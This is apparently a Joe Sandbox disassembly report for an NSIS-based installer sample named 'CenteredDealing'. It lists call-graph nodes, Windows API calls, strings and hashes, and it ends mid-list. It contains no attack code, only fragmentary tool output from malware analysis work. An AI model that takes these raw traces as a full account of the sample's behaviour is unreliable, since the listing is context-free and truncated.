4029->4027 4031 406b25 WideCharToMultiByte 4029->4031 4030 406ac7 CloseHandle GetShortPathNameW 4030->4027 4032 406adf 4030->4032 4031->4027 4033 406b3d wsprintfA 4031->4033 4032->4024 4032->4027 4034 406805 18 API calls 4033->4034 4035 406b69 4034->4035 4050 405e50 GetFileAttributesW CreateFileW 4035->4050 4037 406b76 4037->4027 4038 406b83 GetFileSize GlobalAlloc 4037->4038 4039 406ba4 ReadFile 4038->4039 4040 406c58 CloseHandle 4038->4040 4039->4040 4041 406bbe 4039->4041 4040->4027 4041->4040 4051 405db6 lstrlenA 4041->4051 4044 406bd7 lstrcpyA 4047 406bf9 4044->4047 4045 406beb 4046 405db6 4 API calls 4045->4046 4046->4047 4048 406c30 SetFilePointer WriteFile GlobalFree 4047->4048 4048->4040 4049->4030 4050->4037 4052 405df7 lstrlenA 4051->4052 4053 405dd0 lstrcmpiA 4052->4053 4054 405dff 4052->4054 4053->4054 4055 405dee CharNextA 4053->4055 4054->4044 4054->4045 4055->4052 4937 402a84 4938 401553 19 API calls 4937->4938 4939 402a8e 4938->4939 4940 401446 18 API calls 4939->4940 4941 402a98 4940->4941 4942 401a13 4941->4942 4943 402ab2 RegEnumKeyW 4941->4943 4944 402abe RegEnumValueW 4941->4944 4945 402a7e 4943->4945 4944->4942 4944->4945 4945->4942 4946 4029e4 RegCloseKey 4945->4946 4946->4942 4947 402c8a 4948 402ca2 4947->4948 4949 402c8f 4947->4949 4951 40145c 18 API calls 4948->4951 4950 401446 18 API calls 4949->4950 4953 402c97 4950->4953 4952 402ca9 lstrlenW 4951->4952 4952->4953 4954 402ccb WriteFile 4953->4954 4955 401a13 4953->4955 4954->4955 4956 40400d 4957 40406a 4956->4957 4958 40401a lstrcpynA lstrlenA 4956->4958 4958->4957 4959 40404b 4958->4959 4959->4957 4960 404057 GlobalFree 4959->4960 4960->4957 4961 401d8e 4962 40145c 18 API calls 4961->4962 4963 401d95 ExpandEnvironmentStringsW 4962->4963 4964 401da8 4963->4964 4966 401db9 4963->4966 4965 401dad lstrcmpW 4964->4965 4964->4966 4965->4966 4967 401e0f 4968 401446 18 API calls 4967->4968 4969 401e17 4968->4969 4970 401446 18 API calls 4969->4970 4971 401e21 4970->4971 4972 4030e3 4971->4972 
4974 405f51 wsprintfW 4971->4974 4974->4972 4975 402392 4976 40145c 18 API calls 4975->4976 4977 402399 4976->4977 4980 4071f8 4977->4980 4981 406ed2 25 API calls 4980->4981 4982 407218 4981->4982 4983 407222 lstrcpynW lstrcmpW 4982->4983 4984 4023a7 4982->4984 4985 407254 4983->4985 4986 40725a lstrcpynW 4983->4986 4985->4986 4986->4984 4056 402713 4071 406009 lstrcpynW 4056->4071 4058 40272c 4072 406009 lstrcpynW 4058->4072 4060 402738 4061 40145c 18 API calls 4060->4061 4063 402743 4060->4063 4061->4063 4062 402752 4065 40145c 18 API calls 4062->4065 4067 402761 4062->4067 4063->4062 4064 40145c 18 API calls 4063->4064 4064->4062 4065->4067 4066 40145c 18 API calls 4068 40276b 4066->4068 4067->4066 4069 4062a3 11 API calls 4068->4069 4070 40277f WritePrivateProfileStringW 4069->4070 4071->4058 4072->4060 4987 402797 4988 40145c 18 API calls 4987->4988 4989 4027ae 4988->4989 4990 40145c 18 API calls 4989->4990 4991 4027b7 4990->4991 4992 40145c 18 API calls 4991->4992 4993 4027c0 GetPrivateProfileStringW lstrcmpW 4992->4993 4994 402e18 4995 40145c 18 API calls 4994->4995 4996 402e1f FindFirstFileW 4995->4996 4997 402e32 4996->4997 5002 405f51 wsprintfW 4997->5002 4999 402e43 5003 406009 lstrcpynW 4999->5003 5001 402e50 5002->4999 5003->5001 5004 401e9a 5005 40145c 18 API calls 5004->5005 5006 401ea1 5005->5006 5007 401446 18 API calls 5006->5007 5008 401eab wsprintfW 5007->5008 4284 401a1f 4285 40145c 18 API calls 4284->4285 4286 401a26 4285->4286 4287 4062a3 11 API calls 4286->4287 4288 401a49 4287->4288 4289 401a64 4288->4289 4290 401a5c 4288->4290 4338 406009 lstrcpynW 4289->4338 4337 406009 lstrcpynW 4290->4337 4293 401a62 4297 406038 5 API calls 4293->4297 4294 401a6f 4295 406722 3 API calls 4294->4295 4296 401a75 lstrcatW 4295->4296 4296->4293 4299 401a81 4297->4299 4298 4062d5 2 API calls 4298->4299 4299->4298 4300 405e30 2 API calls 4299->4300 4302 401a98 CompareFileTime 4299->4302 4303 401ba9 4299->4303 4307 4062a3 11 API calls 4299->4307 4311 406009 
lstrcpynW 4299->4311 4317 406805 18 API calls 4299->4317 4324 405ca0 MessageBoxIndirectW 4299->4324 4328 401b50 4299->4328 4335 401b5d 4299->4335 4336 405e50 GetFileAttributesW CreateFileW 4299->4336 4300->4299 4302->4299 4304 404f72 25 API calls 4303->4304 4306 401bb3 4304->4306 4305 404f72 25 API calls 4308 401b70 4305->4308 4309 40337f 37 API calls 4306->4309 4307->4299 4312 4062a3 11 API calls 4308->4312 4310 401bc6 4309->4310 4313 4062a3 11 API calls 4310->4313 4311->4299 4319 401b8b 4312->4319 4314 401bda 4313->4314 4315 401be9 SetFileTime 4314->4315 4316 401bf8 CloseHandle 4314->4316 4315->4316 4318 401c09 4316->4318 4316->4319 4317->4299 4320 401c21 4318->4320 4321 401c0e 4318->4321 4323 406805 18 API calls 4320->4323 4322 406805 18 API calls 4321->4322 4325 401c16 lstrcatW 4322->4325 4326 401c29 4323->4326 4324->4299 4325->4326 4327 4062a3 11 API calls 4326->4327 4329 401c34 4327->4329 4330 401b93 4328->4330 4331 401b53 4328->4331 4332 405ca0 MessageBoxIndirectW 4329->4332 4333 4062a3 11 API calls 4330->4333 4334 4062a3 11 API calls 4331->4334 4332->4319 4333->4319 4334->4335 4335->4305 4336->4299 4337->4293 4338->4294 5009 40209f GetDlgItem GetClientRect 5010 40145c 18 API calls 5009->5010 5011 4020cf LoadImageW SendMessageW 5010->5011 5012 4030e3 5011->5012 5013 4020ed DeleteObject 5011->5013 5013->5012 5014 402b9f 5015 401446 18 API calls 5014->5015 5020 402ba7 5015->5020 5016 402c4a 5017 402bdf ReadFile 5019 402c3d 5017->5019 5017->5020 5018 401446 18 API calls 5018->5019 5019->5016 5019->5018 5026 402d17 ReadFile 5019->5026 5020->5016 5020->5017 5020->5019 5021 402c06 MultiByteToWideChar 5020->5021 5022 402c3f 5020->5022 5024 402c4f 5020->5024 5021->5020 5021->5024 5027 405f51 wsprintfW 5022->5027 5024->5019 5025 402c6b SetFilePointer 5024->5025 5025->5019 5026->5019 5027->5016 5028 402b23 GlobalAlloc 5029 402b39 5028->5029 5030 402b4b 5028->5030 5031 401446 18 API calls 5029->5031 5032 40145c 18 API calls 5030->5032 5033 402b41 5031->5033 5034 402b52 
WideCharToMultiByte lstrlenA 5032->5034 5035 402b93 5033->5035 5036 402b84 WriteFile 5033->5036 5034->5033 5036->5035 5037 402384 GlobalFree 5036->5037 5037->5035 5039 4044a5 5040 404512 5039->5040 5041 4044df 5039->5041 5043 40451f GetDlgItem GetAsyncKeyState 5040->5043 5050 4045b1 5040->5050 5107 405c84 GetDlgItemTextW 5041->5107 5046 40453e GetDlgItem 5043->5046 5053 40455c 5043->5053 5044 4044ea 5047 406038 5 API calls 5044->5047 5045 40469d 5105 404833 5045->5105 5109 405c84 GetDlgItemTextW 5045->5109 5048 403d3f 19 API calls 5046->5048 5049 4044f0 5047->5049 5052 404551 ShowWindow 5048->5052 5055 403e74 5 API calls 5049->5055 5050->5045 5056 406805 18 API calls 5050->5056 5050->5105 5052->5053 5058 404579 SetWindowTextW 5053->5058 5063 405d59 4 API calls 5053->5063 5054 403dca 8 API calls 5059 404847 5054->5059 5060 4044f5 GetDlgItem 5055->5060 5061 40462f SHBrowseForFolderW 5056->5061 5057 4046c9 5062 40677e 18 API calls 5057->5062 5064 403d3f 19 API calls 5058->5064 5065 404503 IsDlgButtonChecked 5060->5065 5060->5105 5061->5045 5066 404647 CoTaskMemFree 5061->5066 5067 4046cf 5062->5067 5068 40456f 5063->5068 5069 404597 5064->5069 5065->5040 5070 406722 3 API calls 5066->5070 5110 406009 lstrcpynW 5067->5110 5068->5058 5074 406722 3 API calls 5068->5074 5071 403d3f 19 API calls 5069->5071 5072 404654 5070->5072 5075 4045a2 5071->5075 5076 40468b SetDlgItemTextW 5072->5076 5081 406805 18 API calls 5072->5081 5074->5058 5108 403d98 SendMessageW 5075->5108 5076->5045 5077 4046e6 5079 4062fc 3 API calls 5077->5079 5088 4046ee 5079->5088 5080 4045aa 5084 4062fc 3 API calls 5080->5084 5082 404673 lstrcmpiW 5081->5082 5082->5076 5085 404684 lstrcatW 5082->5085 5083 404730 5111 406009 lstrcpynW 5083->5111 5084->5050 5085->5076 5087 404739 5089 405d59 4 API calls 5087->5089 5088->5083 5093 406751 2 API calls 5088->5093 5094 404785 5088->5094 5090 40473f GetDiskFreeSpaceW 5089->5090 5092 404763 MulDiv 5090->5092 5090->5094 5092->5094 5093->5088 5096 4047e2 
5094->5096 5097 4043ad 21 API calls 5094->5097 5095 404805 5112 403d85 KiUserCallbackDispatcher 5095->5112 5096->5095 5098 40141d 80 API calls 5096->5098 5099 4047d3 5097->5099 5098->5095 5101 4047e4 SetDlgItemTextW 5099->5101 5102 4047d8 5099->5102 5101->5096 5103 4043ad 21 API calls 5102->5103 5103->5096 5104 404821 5104->5105 5113 403d61 5104->5113 5105->5054 5107->5044 5108->5080 5109->5057 5110->5077 5111->5087 5112->5104 5114 403d74 SendMessageW 5113->5114 5115 403d6f 5113->5115 5114->5105 5115->5114 5116 402da5 5117 4030e3 5116->5117 5118 402dac 5116->5118 5119 401446 18 API calls 5118->5119 5120 402db8 5119->5120 5121 402dbf SetFilePointer 5120->5121 5121->5117 5122 402dcf 5121->5122 5122->5117 5124 405f51 wsprintfW 5122->5124 5124->5117 5125 4030a9 SendMessageW 5126 4030c2 InvalidateRect 5125->5126 5127 4030e3 5125->5127 5126->5127 5128 401cb2 5129 40145c 18 API calls 5128->5129 5130 401c54 5129->5130 5131 4062a3 11 API calls 5130->5131 5134 401c64 5130->5134 5132 401c59 5131->5132 5133 406c9b 81 API calls 5132->5133 5133->5134 4083 4021b5 4084 40145c 18 API calls 4083->4084 4085 4021bb 4084->4085 4086 40145c 18 API calls 4085->4086 4087 4021c4 4086->4087 4088 40145c 18 API calls 4087->4088 4089 4021cd 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021d6 4090->4091 4092 404f72 25 API calls 4091->4092 4093 4021e2 ShellExecuteW 4092->4093 4094 40221b 4093->4094 4095 40220d 4093->4095 4097 4062a3 11 API calls 4094->4097 4096 4062a3 11 API calls 4095->4096 4096->4094 4098 402230 4097->4098 5142 402238 5143 40145c 18 API calls 5142->5143 5144 40223e 5143->5144 5145 4062a3 11 API calls 5144->5145 5146 40224b 5145->5146 5147 404f72 25 API calls 5146->5147 5148 402255 5147->5148 5149 405c3f 2 API calls 5148->5149 5150 40225b 5149->5150 5151 4062a3 11 API calls 5150->5151 5154 4022ac CloseHandle 5150->5154 5157 40226d 5151->5157 5153 4030e3 5154->5153 5155 402283 WaitForSingleObject 5156 402291 GetExitCodeProcess 5155->5156 5155->5157 5156->5154 5159 4022a3 
5156->5159 5157->5154 5157->5155 5158 406332 2 API calls 5157->5158 5158->5155 5161 405f51 wsprintfW 5159->5161 5161->5154 5162 4040b8 5163 4040d3 5162->5163 5171 404201 5162->5171 5167 40410e 5163->5167 5193 403fca WideCharToMultiByte 5163->5193 5164 40426c 5165 404276 GetDlgItem 5164->5165 5166 40433e 5164->5166 5168 404290 5165->5168 5169 4042ff 5165->5169 5172 403dca 8 API calls 5166->5172 5174 403d3f 19 API calls 5167->5174 5168->5169 5177 4042b6 6 API calls 5168->5177 5169->5166 5178 404311 5169->5178 5171->5164 5171->5166 5173 40423b GetDlgItem SendMessageW 5171->5173 5176 404339 5172->5176 5198 403d85 KiUserCallbackDispatcher 5173->5198 5175 40414e 5174->5175 5180 403d3f 19 API calls 5175->5180 5177->5169 5181 404327 5178->5181 5182 404317 SendMessageW 5178->5182 5185 40415b CheckDlgButton 5180->5185 5181->5176 5186 40432d SendMessageW 5181->5186 5182->5181 5183 404267 5184 403d61 SendMessageW 5183->5184 5184->5164 5196 403d85 KiUserCallbackDispatcher 5185->5196 5186->5176 5188 404179 GetDlgItem 5197 403d98 SendMessageW 5188->5197 5190 40418f SendMessageW 5191 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5190->5191 5192 4041ac GetSysColor 5190->5192 5191->5176 5192->5191 5194 404007 5193->5194 5195 403fe9 GlobalAlloc WideCharToMultiByte 5193->5195 5194->5167 5195->5194 5196->5188 5197->5190 5198->5183 4192 401eb9 4193 401f24 4192->4193 4194 401ec6 4192->4194 4195 401f53 GlobalAlloc 4193->4195 4196 401f28 4193->4196 4197 401ed5 4194->4197 4204 401ef7 4194->4204 4198 406805 18 API calls 4195->4198 4203 4062a3 11 API calls 4196->4203 4208 401f36 4196->4208 4199 4062a3 11 API calls 4197->4199 4202 401f46 4198->4202 4200 401ee2 4199->4200 4205 402708 4200->4205 4210 406805 18 API calls 4200->4210 4202->4205 4206 402387 GlobalFree 4202->4206 4203->4208 4214 406009 lstrcpynW 4204->4214 4206->4205 4216 406009 lstrcpynW 4208->4216 4209 401f06 4215 406009 lstrcpynW 4209->4215 4210->4200 4212 401f15 4217 406009 lstrcpynW 4212->4217 4214->4209 
4215->4212 4216->4202 4217->4205 5199 4074bb 5201 407344 5199->5201 5200 407c6d 5201->5200 5202 4073c2 GlobalFree 5201->5202 5203 4073cb GlobalAlloc 5201->5203 5204 407443 GlobalAlloc 5201->5204 5205 40743a GlobalFree 5201->5205 5202->5203 5203->5200 5203->5201 5204->5200 5204->5201 5205->5204

Control-flow Graph

• Executed
• Not Executed
APIs
• GetDlgItem.USER32(?,00000403), ref: 0040512F
• GetDlgItem.USER32(?,000003EE), ref: 0040513E
• GetClientRect.USER32(?,?), ref: 00405196
• GetSystemMetrics.USER32(00000015), ref: 0040519E
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
• ShowWindow.USER32(?,00000008), ref: 0040523A
• GetDlgItem.USER32(?,000003EC), ref: 0040525B
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
• GetDlgItem.USER32(?,000003F8), ref: 0040514D
  • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
• GetDlgItem.USER32(?,000003EC), ref: 004052AB
• CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
• CloseHandle.KERNELBASE(00000000), ref: 004052C0
• ShowWindow.USER32(00000000), ref: 004052E7
• ShowWindow.USER32(?,00000008), ref: 004052EC
• ShowWindow.USER32(00000008), ref: 00405333
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
• CreatePopupMenu.USER32 ref: 00405376
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00405411
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0040546E
                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: @rD$New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                • API String ID: 2110491804-2409696222
                                                                                                                                                                                                                                                                • Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                                                                                • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Control-flow Graph 305 (first block 403883-403919; legend: Executed, Not Executed)
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • #17.COMCTL32 ref: 004038A2
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                                                                                                                                                                                • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(?), ref: 00403AD1
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                                                                                                                                                                                • API String ID: 2435955865-239407132
                                                                                                                                                                                                                                                                • Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                                                                                • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

APIs
• GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
• GetSystemDirectoryW.KERNEL32(9732,00002004), ref: 00406958
  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
• GetWindowsDirectoryW.KERNEL32(9732,00002004), ref: 0040696B
• lstrcatW.KERNEL32(9732,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
• lstrlenW.KERNEL32(9732,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
Strings
Memory Dump Source
• Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
Similarity
• API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
• String ID: 9732$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 3581403547-2420053876
• Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
• Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
• Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
• Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                                                                                • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
